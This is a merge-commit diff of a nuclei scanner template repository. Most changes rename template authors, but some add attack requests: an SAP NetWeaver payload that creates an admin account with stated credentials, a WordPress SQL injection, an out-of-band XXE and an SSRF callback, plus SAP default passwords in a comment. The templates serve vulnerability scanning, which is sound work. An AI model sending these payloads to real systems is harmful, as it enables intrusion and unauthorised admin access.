Merge pull request #57 from projectdiscovery/master

Updation

README.md

@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
 
 | Templates        | Counts                         | Templates       | Counts                          | Templates      | Counts                       |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves             | 329           | vulnerabilities | 175 | exposed-panels | 146 |
+| cves             | 331           | vulnerabilities | 175 | exposed-panels | 145 |
-| takeovers        | 67        | exposures       | 105       | technologies   | 98   |
+| takeovers        | 67        | exposures       | 106       | technologies   | 99   |
-| misconfiguration | 67 | workflows       | 32         | miscellaneous  | 22  |
+| misconfiguration | 67 | workflows       | 32         | miscellaneous  | 24  |
 | default-logins   | 30 | exposed-tokens  | 0  | dns            | 9            |
-| fuzzing          | 9          | helpers         | 8         | iot            | 13            |
+| fuzzing          | 9          | helpers         | 7         | iot            | 13            |
 
-**111 directories, 1208 files**.
+**112 directories, 1216 files**.
 
 </td>
 </tr>

cves/2013/CVE-2013-2251.yaml

@@ -2,7 +2,7 @@ id: CVE-2013-2251
 
 info:
   name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
-  author: exploitation & @dwisiswant0
+  author: exploitation,dwisiswant0
   severity: critical
   description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
   reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html

cves/2017/CVE-2017-14849.yaml

@@ -2,7 +2,7 @@ id: CVE-2017-14849
 
 info:
   name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
-  author: Random-Robbie
+  author: Random_Robbie
   severity: high
   description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
   tags: cve,cve2017,nodejs,lfi

cves/2017/CVE-2017-5638.yaml

@@ -1,6 +1,6 @@
 id: CVE-2017-5638
 info:
-  author: Random Robbie
+  author: Random_Robbie
   name: Apache Struts2 RCE
   severity: critical
   description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.

cves/2017/CVE-2017-7269.yaml

@@ -2,7 +2,7 @@ id: CVE-2017-7269
 
 info:
   name: Windows Server 2003 & IIS 6.0 RCE
-  author: thomas_from_offensity & @geeknik
+  author: thomas_from_offensity,geeknik
   severity: critical
   description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If <http://" in a PROPFIND request.
   reference:

cves/2017/CVE-2017-7615.yaml

@@ -2,7 +2,7 @@ id: CVE-2017-7615
 
 info:
   name: CVE-2017-7615
-  author: bp0lr & dwisiswant0
+  author: bp0lr,dwisiswant0
   severity: high
   description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
   tags: cve,cve2017,mantisbt

cves/2017/CVE-2017-9506.yaml

@@ -14,7 +14,7 @@ info:
 requests:
   - raw:
       - |
-        GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
+        GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
         Connection: close
@@ -26,4 +26,4 @@ requests:
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
-          - "http"
+          - "dns"

cves/2017/CVE-2017-9841.yaml

@@ -2,7 +2,7 @@ id: CVE-2017-9841
 
 info:
   name: CVE-2017-9841
-  author: Random-Robbie
+  author: Random_Robbie
   severity: high
   description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
   tags: cve,cve2017,php,phpunit,rce

cves/2018/CVE-2018-1000129.yaml

@@ -2,7 +2,7 @@ id: CVE-2018-1000129
 
 info:
   name: Jolokia XSS
-  author: mavericknerd @0h1in9e
+  author: mavericknerd,0h1in9e
   severity: high
   description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
   tags: cve,cve2018,jolokia,xss

cves/2018/CVE-2018-1000861.yaml

@@ -2,7 +2,7 @@ id: CVE-2018-1000861
 
 info:
   name: Jenkins 2.138 Remote Command Execution
-  author: dhiyaneshDK & @pikpikcu
+  author: dhiyaneshDK,pikpikcu
   severity: critical
   reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
   tags: cve,cve2018,jenkin,rce

cves/2018/CVE-2018-11409.yaml

@@ -2,7 +2,7 @@ id: CVE-2018-11409
 
 info:
   name: Splunk Sensitive Information Disclosure
-  author: Harsh Bothra
+  author: harshbothra_
   severity: medium
   reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
   tags: cve,cve2018,splunk

cves/2018/CVE-2018-11759.yaml

@@ -2,7 +2,7 @@ id: CVE-2018-11759
 
 info:
   name: Apache Tomcat JK Status Manager Access
-  author: Harsh Bothra
+  author: harshbothra_
   severity: medium
   reference: https://github.com/immunIT/CVE-2018-11759
   tags: cve,cve2018,apache

cves/2018/CVE-2018-1247.yaml

@@ -17,7 +17,12 @@ requests:
         words:
           - "application/x-shockwave-flash"
         part: header
+
       - type: word
         words:
           - "javascript:alert(1337)"
         part: body
+
+      - type: status
+        status:
+          - 200

cves/2018/CVE-2018-19439.yaml

@@ -2,7 +2,7 @@ id: CVE-2018-19439
 
 info:
   name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
-  author: madrobot & dwisiswant0
+  author: madrobot,dwisiswant0
   severity: high
   description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
   tags: cve,cve2018,oracle,xss

cves/2018/CVE-2018-20824.yaml

@@ -2,7 +2,7 @@ id: CVE-2018-20824
 
 info:
   name: Atlassian Jira WallboardServlet XSS
-  author: madrobot & dwisiswant0
+  author: madrobot,dwisiswant0
   severity: medium
   description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
   tags: cve,cve2018,atlassian,jira,xss

cves/2019/CVE-2019-15858.yaml

@@ -2,7 +2,7 @@ id: CVE-2019-15858
 
 info:
   name: Unauthenticated Woody Ad Snippets WordPress Plugin RCE
-  author: dwisiswant0 & fmunozs & patralos
+  author: dwisiswant0,fmunozs,patralos
   severity: high
   description: |
     This template supports the detection part only. See references.

cves/2019/CVE-2019-17382.yaml

@@ -2,7 +2,7 @@ id: CVE-2019-17382
 
 info:
   name: Zabbix Authentication Bypass
-  author: Harsh Bothra
+  author: harshbothra_
   severity: critical
   description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
   reference: https://www.exploit-db.com/exploits/47467

cves/2019/CVE-2019-17558.yaml

@@ -1,7 +1,7 @@
 id: CVE-2019-17558
 info:
   name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
-  author: pikpikcu & madrobot
+  author: pikpikcu,madrobot
   severity: critical
   refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
   tags: cve,cve2019,apache,rce,solr

cves/2019/CVE-2019-19985.yaml

@@ -2,7 +2,7 @@ id: CVE-2019-19985
 
 info:
   name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
-  author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
+  author: KBA@SOGETI_ESEC,madrobot,dwisiswant0
   severity: medium
   description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure.
   refrense: https://www.exploit-db.com/exploits/48698

cves/2019/CVE-2019-2767.yaml

@@ -0,0 +1,23 @@
+id: CVE-2019-2767
+
+info:
+  name: Oracle Business Intelligence - Publisher XXE
+  author: madrobot
+  severity: high
+  description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
+  reference: |
+      - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
+      - https://www.exploit-db.com/exploits/46729
+  tags: cve,cve2019,oracle,xxe,oob
+
+requests:
+  - raw:
+      - |
+        GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the DNS Interaction
+        words:
+          - "dns"

cves/2019/CVE-2019-3396.yaml

@@ -1,6 +1,6 @@
 id: CVE-2019-3396
 info:
-  author: Harsh Bothra
+  author: harshbothra_
   name: Atlassian Confluence Path Traversal
   severity: high
   description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

cves/2019/CVE-2019-8449.yaml

@@ -2,7 +2,7 @@ id: CVE-2019-8449
 
 info:
   name: JIRA Unauthenticated Sensitive Information Disclosure
-  author: Harsh Bothra
+  author: harshbothra_
   severity: medium
   description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
   reference: |

cves/2019/CVE-2019-9978.yaml

@@ -2,7 +2,7 @@ id: CVE-2019-9978
 
 info:
   name: WordPress social-warfare RFI
-  author: madrobot & dwisiswant0
+  author: madrobot,dwisiswant0
   severity: critical
   description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
   reference: https://github.com/mpgn/CVE-2019-9978

cves/2020/CVE-2020-12720.yaml

@@ -2,7 +2,7 @@ id: CVE-2020-12720
 
 info:
   name: CVE-2020-12720 vBulletin SQLI
-  author: pdnuclei - projectdiscovery.io
+  author: pdteam
   severity: critical
   description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
   reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720

cves/2020/CVE-2020-5284.yaml

@@ -2,7 +2,7 @@ id: CVE-2020-5284
 
 info:
   name: Next.js .next/ limited path traversal
-  author: Harsh & Rahul & dwisiswant0
+  author: rootxharsh,iamnoooob,dwisiswant0
   severity: medium
   description: Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.
   tags: cve,cve2020,nextjs,lfi

cves/2020/CVE-2020-5405.yaml

@@ -2,7 +2,7 @@ id: CVE-2020-5405
 
 info:
   name: Spring Cloud Directory Traversal
-  author: Harsh Bothra
+  author: harshbothra_
   severity: high
   description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
   reference: https://pivotal.io/security/cve-2020-5405

cves/2020/CVE-2020-5902.yaml

@@ -2,7 +2,7 @@ id: CVE-2020-5902
 
 info:
   name: F5 BIG-IP TMUI RCE
-  author: madrobot & dwisiswant0 & ringo
+  author: madrobot,dwisiswant0,ringo
   severity: high
   description: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
   reference: |

cves/2020/CVE-2020-6287.yaml

@@ -1,7 +1,7 @@
 id: CVE-2020-6287
 
 info:
-  name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
+  name: SAP NetWeaver - Remote Admin addition
   author: dwisiswant0
   severity: critical
   tags: cve,cve2020,sap
@@ -11,24 +11,32 @@ info:
     - https://launchpad.support.sap.com/#/notes/2934135
     - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
     - https://www.onapsis.com/recon-sap-cyber-security-vulnerability
+    - https://github.com/chipik/SAP_RECON
 
 requests:
-  - payloads:
+  - raw:
-      data: helpers/payloads/CVE-2020-6287.xml
-    raw:
       - |
         POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
         Host: {{Hostname}}
         Content-Type: text/xml; charset=UTF-8
         Connection: close
 
-        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>
+          CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==
+        </baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
+
+      # userName - sapRpoc6351
+      # password - Secure!PwD8890
+
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "urn:CTCWebServiceSi"
+          - "CTCWebServiceSi"
+          - "SOAP-ENV"
         part: body
+        condition: and
+
       - type: status
         status:
           - 200
@@ -36,4 +44,5 @@ requests:
       - type: word
         words:
           - "text/xml"
+          - "SAP NetWeaver Application Server"
         part: header

cves/2020/CVE-2020-8115.yaml

@@ -2,7 +2,7 @@ id: CVE-2020-8115
 
 info:
   name: Revive Adserver XSS
-  author: madrobot & dwisiswant0
+  author: madrobot,dwisiswant0
   severity: medium
   description: |
     A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.

cves/2020/CVE-2020-8512.yaml

@@ -2,7 +2,7 @@ id: CVE-2020-8512
 
 info:
   name: IceWarp WebMail XSS
-  author: pdnuclei & dwisiswant0
+  author: pdteam,dwisiswant0
   severity: medium
   description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
   reference: |

cves/2021/CVE-2021-22986.yaml

@@ -1,7 +1,7 @@
 id: CVE-2021-22986
 info:
   name: F5 BIG-IP iControl REST unauthenticated RCE
-  author: Harsh Jaiswal (@rootxharsh) & Rahul Maini (@iamnoooob)
+  author: rootxharsh,iamnoooob
   severity: critical
   tags: bigip,cve,cve2021,rce
   description: The iControl REST interface has an unauthenticated remote command execution vulnerability.

cves/2021/CVE-2021-24285.yaml

@@ -0,0 +1,33 @@
+id: CVE-2021-24285
+
+info:
+  name: Car Seller - Auto Classifieds Script WordPress plugin SQLI
+  author: ShreyaPohekar
+  severity: critical
+  description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
+  tags: cve,cve2021,wordpress,wp-plugin,sqli
+  reference: |
+      - https://nvd.nist.gov/vuln/detail/CVE-2021-24285
+      - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
+      - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Content-Length: 47
+
+        action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"
+        part: body

default-logins/rabbitmq/rabbitmq-default-admin.yaml

@@ -2,7 +2,7 @@ id: rabbitmq-default-admin
 
 info:
   name: RabbitMQ Default Credentials
-  author: fyoorer & dwisiswant0
+  author: fyoorer,dwisiswant0
   severity: high
   tags: rabbitmq,default-login
 

dns/dead-host-with-cname.yaml

@@ -2,7 +2,7 @@ id: dead-host-with-cname
 
 info:
   name: dead-host-with-cname
-  author: pdnuclei - projectdiscovery.io
+  author: pdteam
   severity: info
   tags: dns
 

exposed-panels/adminer-panel.yaml

@@ -1,7 +1,7 @@
 id: adminer-panel
 info:
   name: Adminer Login panel
-  author: random-robbie & meme-lord
+  author: random_robbie,meme-lord
   severity: info
   reference: https://blog.sorcery.ie/posts/adminer/
   tags: panel

exposed-panels/jmx-console.yaml

@@ -1,7 +1,7 @@
 id: jmx-console
 info:
   name: JMX Console
-  author: Yash Anand @yashanand155
+  author: yashanand155
   severity: low
   tags: panel
 

exposed-panels/joomla-panel.yaml

@@ -2,7 +2,7 @@ id: joomla-panel
 
 info:
   name: Joomla Panel
-  author: github.com/its0x08
+  author: its0x08
   severity: info
   tags: panel
 

exposed-panels/mobileiron-login.yaml

@@ -2,7 +2,7 @@ id: mobileiron-login
 
 info:
   name: MobileIron Login
-  author: dhiyaneshDK & @dwisiswant0
+  author: dhiyaneshDK,dwisiswant0
   Severity: info
   tags: panel
 

exposed-panels/open-stack-dashboard-login.yaml

@@ -2,7 +2,7 @@ id: open-stack-dashboard-login
 
 info:
   name: OpenStack Dashboard
-  author: dhiyaneshDK & hackergautam
+  author: dhiyaneshDK,hackergautam
   severity: info
   reference: https://www.exploit-db.com/ghdb/6464
   tags: panel,openstack

exposed-panels/public-tomcat-manager.yaml

@@ -2,7 +2,7 @@ id: public-tomcat-manager
 
 info:
   name: tomcat manager disclosure
-  author: Ahmed Sherif & geeknik
+  author: Ahmed Sherif,geeknik
   severity: info
   tags: panel
 

exposed-panels/sap-netweaver-portal.yaml

@@ -1,10 +1,10 @@
-id: sap-netweaver-portal-detect
+id: sap-netweaver-portal
 
 info:
-  name: SAP NetWeaver Portal detect
+  name: SAP NetWeaver Portal
   author: organiccrap
   severity: info
-  tags: panel
+  tags: panel,sap
 
   # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
 

exposed-panels/sap-recon-detect.yaml

@@ -1,36 +0,0 @@
-id: sap-recon-detect
-
-info:
-  name: SAP RECON Finder
-  author: samueladi_ & organiccrap
-  severity: medium
-  tags: panel
-
-  # Source:- https://github.com/chipik/SAP_RECON
-  # This is detection template, please use above poc to exploit this further.
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/CTCWebService/CTCWebServiceBean"
-      - "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl"
-      - "{{BaseURL}}/CTCWebService/Config1?wsdl"
-
-    matchers-condition: and
-    matchers:
-
-      - type: word
-        words:
-          - Method Not Allowed
-          - Expected request method POST. Found GET.
-          - Generated by WSDLDefinitionsParser
-          - bns0:Config1Binding
-          - wsdl:definitions
-          - tns:CTCWebServiceSiBinding
-        condition: or
-
-      - type: status
-        status:
-          - 405
-          - 200
-        condition: or

exposed-panels/traefik-dashboard.yaml

@@ -2,7 +2,7 @@ id: traefik-dashboard-detect
 
 info:
   name: Traefik Dashboard
-  author: schniggie & StreetOfHackerR007
+  author: schniggie,StreetOfHackerR007
   severity: info
   tags: panel
 

exposed-panels/webeditors.yaml

@@ -2,7 +2,7 @@ id: webeditors
 
 info:
   name: Web Editors
-  author: pwnmachine
+  author: princechaddha
   severity: info
   tags: panel
 

exposures/apis/wadl-api.yaml

@@ -2,7 +2,7 @@ id: wadl-api
 
 info:
   name: wadl file disclosure
-  author: 0xrudra & manuelbua
+  author: 0xrudra,manuelbua
   severity: info
   tags: exposure,api
   reference: |

exposures/backups/sql-dump.yaml

@@ -2,7 +2,7 @@ id: default-sql-dump
 
 info:
   name: MySQL Dump Files
-  author: geeknik & @dwisiswant0
+  author: geeknik,dwisiswant0
   severity: medium
   tags: exposure,backup
 

exposures/backups/zip-backup-files.yaml

@@ -2,7 +2,7 @@ id: zip-backup-files
 
 info:
   name: Compressed Web File
-  author: Toufik Airane & @dwisiswant0
+  author: Toufik Airane,dwisiswant0
   severity: medium
   tags: exposure,backup
 

exposures/configs/docker-compose-config.yaml

@@ -2,7 +2,7 @@ id: docker-compose-config
 
 info:
   name: docker-compose.yml exposure
-  author: meme-lord & blckraven & geeknik
+  author: meme-lord,blckraven,geeknik
   severity: medium
   tags: config,exposure,devops
 

exposures/configs/exposed-svn.yaml

@@ -2,7 +2,7 @@ id: exposed-svn
 
 info:
   name: Exposed SVN Directory
-  author: udit_thakkur & dwisiswant0
+  author: udit_thakkur,dwisiswant0
   severity: medium
   tags: config,exposure,svn
 

exposures/configs/git-config.yaml

@@ -2,7 +2,7 @@ id: git-config
 
 info:
   name: Git Config Disclosure
-  author: pdteam & pikpikcu
+  author: pdteam,pikpikcu
   severity: medium
   description: Searches for the pattern /.git/config on passed URLs.
   tags: config,git,exposure

exposures/configs/laravel-env.yaml

@@ -2,7 +2,7 @@ id: laravel-env
 
 info:
   name: Laravel .env file accessible
-  author: pxmme1337 & dwisiswant0 & geeknik & emenalf
+  author: pxmme1337,dwisiswant0,geeknik,emenalf
   severity: critical
   description: Laravel uses the .env file to store sensitive information like database credentials and tokens. It should not be publicly accessible.
   reference: https://laravel.com/docs/master/configuration#environment-configuration

exposures/configs/package-json.yaml

@@ -2,7 +2,7 @@ id: package-json
 
 info:
   name: npm package.json disclosure
-  author: geeknik & afaq
+  author: geeknik,afaq
   severity: info
   description: All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project.
   tags: config,exposure

exposures/configs/phpinfo.yaml

@@ -2,7 +2,7 @@ id: phpinfo-files
 
 info:
   name: phpinfo Disclosure
-  author: pdteam & daffainfo & meme-lord
+  author: pdteam,daffainfo,meme-lord
   severity: low
   tags: config,exposure
 

exposures/configs/rails-database-config.yaml

@@ -2,7 +2,7 @@ id: rails-database-config
 
 info:
   name: Ruby-on-Rails Database Configuration Exposure
-  author: pdteam & geeknik
+  author: pdteam,geeknik
   severity: low
   tags: config,exposure,rails
 

exposures/configs/server-private-keys.yaml

@@ -1,7 +1,7 @@
 id: server-private-keys
 
 info:
-  name: Detect Private SSH and TLS Keys
+  name: Detect Private SSH, TLS, and JWT Keys
   author: geeknik
   severity: high
   tags: config,exposure
@@ -25,6 +25,10 @@ requests:
       - "{{BaseURL}}/.ssh/id_dsa"
       - "{{BaseURL}}/{{Hostname}}.key"
       - "{{BaseURL}}/{{Hostname}}.pem"
+      - "{{BaseURL}}/config/jwt/private.pem"
+      - "{{BaseURL}}/jwt/private.pem"
+      - "{{BaseURL}}/var/jwt/private.pem"
+      - "{{BaseURL}}/private.pem"
 
     matchers-condition: and
     matchers:

exposures/files/shellscripts.yaml

@@ -1,9 +1,10 @@
 id: shellscripts
 
 info:
-  name: Published shellscripts
+  name: Public shellscripts
   author: panch0r3d
-  severity: info
+  severity: low
+  tags: bash,exposure
 
 requests:
   - method: GET
@@ -25,17 +26,24 @@ requests:
       - "{{BaseURL}}/wp-setup.sh"
       - "{{BaseURL}}/deploy.sh"
       - "{{BaseURL}}/aws.sh"
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         words:
+          - "application/x-sh"
           - "text/plain"
+          - "text/x-sh"
         part: header
+        condition: or
+
       - type: regex
         regex:
           - ".*?bin.*?sh"
           - ".*?bin.*?bash"
         part: body
+        condition: or

exposures/logs/error-logs.yaml

@@ -1,7 +1,7 @@
 id: error-logs
 info:
   name: common error log files
-  author: geeknik & daffainfo
+  author: geeknik,daffainfo
   severity: low
   tags: logs,exposure
 

exposures/logs/laravel-log-file.yaml

@@ -2,7 +2,7 @@ id: laravel-log-file
 
 info:
   name: Laravel log file publicly accessible
-  author: sheikhrishad & geeknik
+  author: sheikhrishad,geeknik
   severity: high
   description: The log file of this Laravel web app might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information.
   reference: https://laravel.com/docs/master/logging

exposures/tokens/generic/general-tokens.yaml

@@ -2,7 +2,7 @@ id: generic-tokens
 
 info:
   name: Generic Tokens
-  author: nadino & geeknik
+  author: nadino,geeknik
   severity: info
   tags: exposure,token
 

exposures/tokens/google/fcm-server-key.yaml

@@ -2,7 +2,7 @@ id: fcm-server-key
 
 info:
   name: FCM Server Key
-  author: Abss (@absshax)
+  author: absshax
   severity: high
   tags: exposure,token,google
   reference: https://abss.me/posts/fcm-takeover

fuzzing/adminer-panel-fuzz.yaml

@@ -1,7 +1,7 @@
 id: adminer-panel-fuzz
 info:
   name: Adminer Login Panel Fuzz
-  author: random-robbie & meme-lord
+  author: random_robbie,meme-lord
   severity: info
   reference: https://blog.sorcery.ie/posts/adminer/
   tags: fuzz,adminer

fuzzing/generic-lfi-fuzzing.yaml

@@ -1,7 +1,7 @@
 id: generic-lfi-fuzzing
 info:
